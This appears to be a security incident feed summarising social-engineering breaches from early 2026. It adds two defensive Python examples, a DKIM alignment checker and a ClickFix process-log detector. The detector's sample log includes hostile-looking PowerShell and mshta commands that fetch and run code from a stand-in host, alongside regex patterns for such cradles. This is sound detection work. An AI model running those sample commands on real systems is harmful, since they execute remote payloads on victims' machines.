At least one individual
March 18, 2026
•[ phishing, malware, social engineering ]
Cyber fraudsters in Navi Mumbai impersonated Mahanagar Gas Limited officials and sent malicious WhatsApp files or links that compromised victims' phones and enabled unauthorized access to their bank accounts.
Outpost24
March 16, 2026
•[ phishing, DKIM, social engineering ]
SecurityWeek reported that a C-level executive at Outpost24 was targeted with a sophisticated phishing attempt that used a DKIM-signed email, trusted redirection infrastructure, compromised servers, and Cloudflare-protected phishing pages. Outpost24's subsidiary Specops Software said it detected and blocked the attack early, before any systems were compromised or users impacted.
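A valid DKIM signature proves only that the holder of the signing key for the d= domain signed the message; it says nothing about whether that domain matches the visible From address, which is why a "DKIM-signed" phish still deserves triage. The check below is an added example, not Outpost24's or SecurityWeek's code: it parses the d= tag from each DKIM-Signature header and tests DMARC-style identifier alignment against the From domain (strict: identical domain; relaxed: same organizational domain). It does not verify the signature cryptographically (that needs the selector's public key from DNS), the organizational-domain helper is a two-label approximation rather than a Public Suffix List lookup, and the sample messages and domains are constructed.

```python
"""DKIM d= / From identifier alignment check (DMARC-style).
Added example; the three messages below are constructed for illustration."""
from email import message_from_string
from email.utils import parseaddr


def _org_domain(domain: str) -> str:
    """Approximate organizational domain as the last two labels.
    Assumption: no multi-label public suffixes (co.uk etc.); a real
    implementation should consult the Public Suffix List."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else domain.lower()


def dkim_tags(header_value: str) -> dict:
    """Parse the tag=value list of a DKIM-Signature header (RFC 6376 s3.2).
    Folding whitespace is removed first because the header is usually wrapped."""
    tags = {}
    for part in header_value.replace("\r", "").replace("\n", "").split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip()] = value.strip()
    return tags


def dkim_alignment(raw_message: str) -> dict:
    """Return the From domain, every DKIM d= domain, and whether any signature
    aligns with From. A message with no DKIM-Signature is reported as unaligned."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    signatures = []
    for sig in msg.get_all("DKIM-Signature", []):
        d = dkim_tags(sig).get("d", "").lower()
        signatures.append({
            "d": d,
            "strict": bool(d) and d == from_domain,
            "relaxed": bool(d) and _org_domain(d) == _org_domain(from_domain),
        })
    return {
        "from_domain": from_domain,
        "signatures": signatures,
        "aligned": any(s["relaxed"] for s in signatures),
    }


# Constructed samples. Signature bh=/b= values are placeholders, not real hashes.
ALIGNED = """From: Billing <billing@example.com>
To: ceo@example.net
Subject: Invoice 4471
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=example.com;
 s=sel1; h=from:to:subject; bh=AAAA=; b=BBBB=

Please see the attached invoice.
"""

# Visible sender claims example.com, but the signer is an unrelated domain:
# DKIM can pass here and the message is still not from example.com.
UNALIGNED = """From: IT Support <support@example.com>
To: ceo@example.net
Subject: Action required: password reset
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=mail.example-notify.net;
 s=k1; h=from:to:subject; bh=CCCC=; b=DDDD=

Reset your password at the link below.
"""

# Signed by a subdomain of the From domain: fails strict, passes relaxed.
SUBDOMAIN = """From: Alerts <alerts@example.com>
To: ceo@example.net
Subject: Weekly report
DKIM-Signature: v=1; a=rsa-sha256; d=mail.example.com; s=s2;
 h=from:to:subject; bh=EEEE=; b=FFFF=

Report attached.
"""

if __name__ == "__main__":
    for name, raw in (("aligned", ALIGNED), ("unaligned", UNALIGNED), ("subdomain", SUBDOMAIN)):
        print(name, dkim_alignment(raw))
```

In triage, treat "DKIM pass, alignment fail" as "some third party signed this", and treat "DKIM pass, alignment pass" as "the sender's own infrastructure or a compromised account at that domain signed this", which is still not proof of a legitimate request.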
At least one KakaoTalk user
March 16, 2026
•[ malware, account takeover, cyberattack ]
Yonhap/The Korea Times reported a North Korea-linked group used stolen KakaoTalk accounts to distribute malware in recent cyberattacks, highlighting a new propagation tactic. Reporting said the threat actors compromise victims, gain access to KakaoTalk desktop accounts, and then use that trusted messaging channel to push malicious payloads to selected contacts.
An undisclosed organization
March 12, 2026
•[ ransomware, social engineering, data theft ]
IBM X-Force described a case where a threat actor remained on a compromised server for more than a week and stole data during an Interlock ransomware intrusion. The attack began with ClickFix social engineering and later deployed a PowerShell backdoor called Slopoly (likely AI-assisted), alongside other components such as NodeSnake and InterlockRAT. The article is a case-study/campaign description and does not name the victim organization or quantify the affected records beyond describing persistence and data theft.
At least one Dutch government official
March 9, 2026
•[ social engineering, phishing, state-sponsored hackers ]
Dutch intelligence services warned that Russian state hackers are attempting to gain access to large numbers of Signal and WhatsApp accounts belonging to senior officials, military personnel, and civil servants worldwide. The campaign uses social engineering to trick users into revealing verification and PIN codes, including posing as a Signal support chatbot. The report notes Dutch government employees have also been targeted and, in some cases, compromised. This is campaign/advisory reporting rather than a single discrete victim event.
The City of Arab
March 9, 2026
•[ phishing, BEC, social engineering ]
GovTech reported that the City of Arab, Alabama was hit by a socially engineered phishing/BEC-style fraud in which perpetrators impersonated a legitimate officer of the contractor (FITE Construction) and induced the city to issue a fraudulent payment of $432,739.21 to an unauthorized entity. City leaders stated the fraud was detected internally and triggered a broader investigation. The report focuses on financial loss via social engineering rather than system disruption or data theft.
Undisclosed cryptocurrency organization
March 9, 2026
•[ cryptocurrency, social engineering, cloud compromise ]
The Hacker News reported (citing Google Cloud) that North Korea-linked UNC4899 conducted a sophisticated 2025 cloud compromise targeting an unnamed cryptocurrency organization, stealing millions in cryptocurrency. The intrusion began with social engineering that tricked a developer into downloading a malicious archive for a supposed open-source collaboration; the developer then transferred the file to a work device via AirDrop. After malicious Python code executed and a binary masquerading as kubectl ran, the attackers pivoted into the cloud environment and abused legitimate DevOps workflows to harvest credentials, escape container confines, and tamper with Cloud SQL databases to modify financial logic enabling theft. This is coded as a confirmed successful intrusion with financial theft.
Mercer Advisors
February 16, 2026
•[ cybersecurity breach, ransomware, data leak ]
Wealth Management reported a class action lawsuit alleging Mercer Advisors suffered a cybersecurity breach around Feb. 16, 2026 carried out by ShinyHunters. The complaint said ShinyHunters demanded ransom within 48 hours and threatened to leak roughly 5.7 million client records; after Mercer refused to pay, the group published the stolen information. The article states the leaked data includes names, Social Security numbers, and other personal information, raising risks of identity theft, fraud, and highly targeted phishing/social engineering. The report also mentions ShinyHunters targeting other wealth firms, but the primary record is the Mercer breach and alleged publication of client data.
At least one Bitcoin owner
February 15, 2026
•[ cryptocurrency, phishing, malicious javascript ]
BleepingComputer described a campaign where threat actors abused Pastebin comments to distribute a ClickFix-style attack that tricks cryptocurrency users into executing malicious JavaScript in their browser. The technique enables attackers to hijack crypto swap transactions and redirect funds to attacker-controlled wallets.
CarGurus
February 13, 2026
•[ data breach, social engineering, vishing ]
TechRadar reported that ShinyHunters claimed to have breached CarGurus and stolen about 1.7 million corporate records, threatening to release the data by a stated deadline. The report linked the claim to a broader wave of social-engineering vishing attacks used to obtain employee credentials and MFA codes and then access SSO dashboards (Okta/Entra/Google) and downstream applications. At the time of the report, CarGurus had not publicly confirmed the breach details, the precise intrusion window, or exactly what categories of data were taken beyond the actor's claim, so this record reflects an alleged data-theft event pending independent confirmation.
Figure
February 12, 2026
•[ social engineering, data leak, extortion ]
Figure Technology Solutions confirmed it suffered a data breach after an employee fell victim to a social engineering attack, with attackers obtaining a limited number of files. SecurityWeek reported that the ShinyHunters group took credit and posted archive files on its leak site; Have I Been Pwned analysis identified roughly 967,000 user records in the leaked data. The exposed information includes names, dates of birth, email addresses, postal addresses, and phone numbers. The reporting frames the incident as data theft/extortion without describing service disruption to Figure's lending operations.
Optimizely
February 11, 2026
•[ voice-phishing, social engineering, data leak ]
Attackers associated with the ShinyHunters cybercriminal group used a voice-phishing social engineering attack to gain access to Optimizely's internal systems and CRM environment. Approximately 10,000 client organizations were affected, with exposed data including business contact information such as names, email addresses, and phone numbers.
At least one European official
February 9, 2026
•[ social engineering, scams, QR-code device linking ]
Signal users were targeted with social engineering that combined fake support scams and QR-code device linking to spy on targets.
Portland Public Schools
February 3, 2026
•[ phishing, email compromise, unauthorized access ]
A phishing email offering a fake part-time job opportunity was sent to students after a staff email account (reported as a teacher account) was compromised. Because the message originated from an internal staff account, it bypassed normal restrictions and reached many student inboxes across the district. The district technology department removed copies of the email from the school system and issued guidance for students who submitted information to the linked form. The confirmed effect is unauthorized use of an internal account to distribute phishing content; the report does not confirm broader system compromise or data exfiltration beyond what students may have submitted to the scam.
Westport Public Schools email account
February 2, 2026
•[ phishing, email hijacking, data leak ]
Exposed data: student-submitted personal information via the linked Google Form (name, email address, home address, date of birth, grade level, and bank name). Westport Public Schools reported that a district staff email account (identified as a Spanish teacher's account) was hijacked on a Friday afternoon and then used to send a phishing email to students in grades K-12 with the subject line "Employment Program For Westport Public Schools". The message advertised a work-from-home employment program connected to Feed the Children and included a linked Google Form encouraging students to apply. Because the email originated from an internal staff account, it bypassed normal email restrictions and reached student inboxes across the district, including Staples High School. District officials said the technology department removed all copies of the email from the school system and began identifying students who clicked the link and may have submitted personal information; families of students who filled out the form were contacted directly and advised to monitor accounts for fraud. Officials stated no district systems were breached beyond the single compromised email account and that student school-issued accounts remained secure.
Figure
January 28, 2026
•[ social engineering, fintech, data leak ]
In February 2026, data obtained from the fintech lending platform Figure was publicly posted online. The exposed data, dating back to January 2026, contained over 900k unique email addresses along with names, phone numbers, physical addresses and dates of birth. Figure confirmed the incident and attributed it to a social engineering attack in which an employee was tricked into providing access.
Cuero Chamber of Commerce
January 26, 2026
•[ malware, social engineering, ClickFix ]
The Cuero Chamber of Commerce reported a malware/social engineering incident affecting its web properties after a customer noticed suspicious activity in an email sent January 26. The chamber said users registering for an event were shown a CAPTCHA prompt and then instructed to press Windows+R and paste and run content, behavior consistent with ClickFix social engineering designed to trick victims into executing malicious commands on their own devices. The chamber stated that the Cuero Development Corporation website was the only confirmed security breach and that significant data loss occurred, and it believed the malware was introduced via a third-party platform (Shopify) used for event registration. The chamber said it could not determine how many people or organizations were affected and implemented additional safeguards.
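The ClickFix chain described here and in the IBM X-Force Interlock case above leaves a consistent endpoint trace: an interpreter (PowerShell, mshta, cmd) spawned by explorer.exe, which parents the Win+R Run dialog, with a pasted command line that downloads and executes a payload and often ends in a fake "I am not a robot" verification string so the Run box looks benign. The detector below is an added example, not code from IBM X-Force or the Cuero Chamber of Commerce; it scores constructed Sysmon Event ID 1 (ProcessCreate) records in JSON-lines form by how many of those traits co-occur, and the field names, paths, users and hostnames are all assumptions for illustration.

```python
"""Score process-creation events for ClickFix-style pasted commands.
Added example; SAMPLE_LOG is constructed and not from any real incident."""
import json
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
RUN_DIALOG_PARENT = "explorer.exe"

# Each indicator is one trait of a pasted ClickFix command. None alone is
# conclusive (admins run PowerShell from the Run box too), so the rule counts
# how many co-occur and grades severity on that count.
INDICATORS = [
    ("download_cradle", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|mshta|certutil)\b.*https?://",
        re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("inline_exec", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    # Lures append a fake verification string so the pasted text looks benign.
    ("captcha_lure", re.compile(r"(i am not a robot|recaptcha|cloudflare verification)", re.I)),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict):
    """Return an alert dict for a suspicious ProcessCreate event, else None.
    explorer.exe parents both Win+R and Start-menu launches, so the rule keys
    on the command-line shape rather than on the dialog itself."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image not in INTERPRETERS or parent != RUN_DIALOG_PARENT:
        return None
    hits = [name for name, rx in INDICATORS if rx.search(cmdline)]
    if not hits:
        return None
    severity = "high" if len(hits) >= 3 else "medium" if len(hits) == 2 else "low"
    return {"time": event.get("UtcTime"), "user": event.get("User"), "image": image,
            "hits": hits, "severity": severity, "command_line": cmdline}


def scan(log_text: str) -> list:
    """Scan newline-delimited JSON ProcessCreate events; return alerts in log order."""
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            alert = score_event(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed events (Sysmon Event ID 1 field names; hosts/users are fictional).
SAMPLE_LOG = r'''
{"UtcTime": "2026-01-26 15:02:11", "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"iex (irm https://example.invalid/c.txt)\" # I am not a robot - reCAPTCHA Verification ID: 8421"}
{"UtcTime": "2026-01-26 15:04:40", "User": "CORP\\asmith", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://example.invalid/verify.hta"}
{"UtcTime": "2026-01-26 15:05:02", "User": "CORP\\admin", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell"}
{"UtcTime": "2026-01-26 15:06:19", "User": "CORP\\svc", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"}
{"UtcTime": "2026-01-26 15:07:55", "User": "CORP\\jdoe", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad"}
'''

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["severity"], alert["user"], alert["image"], alert["hits"])
```

The scheduled backup in the fourth record is parented by cmd.exe and is out of scope for this rule on purpose; scripted launches need a different baseline. The bare "powershell" from the Run box in the third record produces no hits and no alert, which is the false-positive case a practitioner will want to confirm before deploying anything like this.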
Crunchbase
January 23, 2026
•[ vishing, social engineering, credential theft ]
Reporting on an Okta SSO vishing (voice-phishing) campaign, ShinyHunters reportedly confirmed to a researcher that it conducted the campaign and launched a new dark web leak site. According to the report, ShinyHunters claimed that multiple victims had their data posted after refusing extortion demands, naming Crunchbase, SoundCloud, and Betterment as initial examples. The incident reflects social-engineering-driven credential theft leading to unauthorized access and data theft, followed by extortion and publication of alleged victim data.
Choice Hotels International
January 14, 2026
•[ social engineering, unauthorized access, PII leak ]
An unauthorized person used social engineering to gain access to a Choice Hotels application containing records on franchisees and franchise applicants, exposing names and Social Security numbers.
Betterment
January 9, 2026
•[ social engineering, phishing, data leak ]
In January 2026, the automated investment platform Betterment confirmed it had suffered a data breach attributed to a social engineering attack. As part of the incident, Betterment customers received fraudulent crypto-related messages promising high returns if funds were sent to an attacker-controlled cryptocurrency wallet. The breach exposed 1.4M unique email addresses, along with names and geographic location data. A subset of records also included dates of birth, phone numbers, and physical addresses. In its disclosure notice, Betterment stated that the incident did not provide attackers with access to customer accounts and did not expose passwords or other login credentials.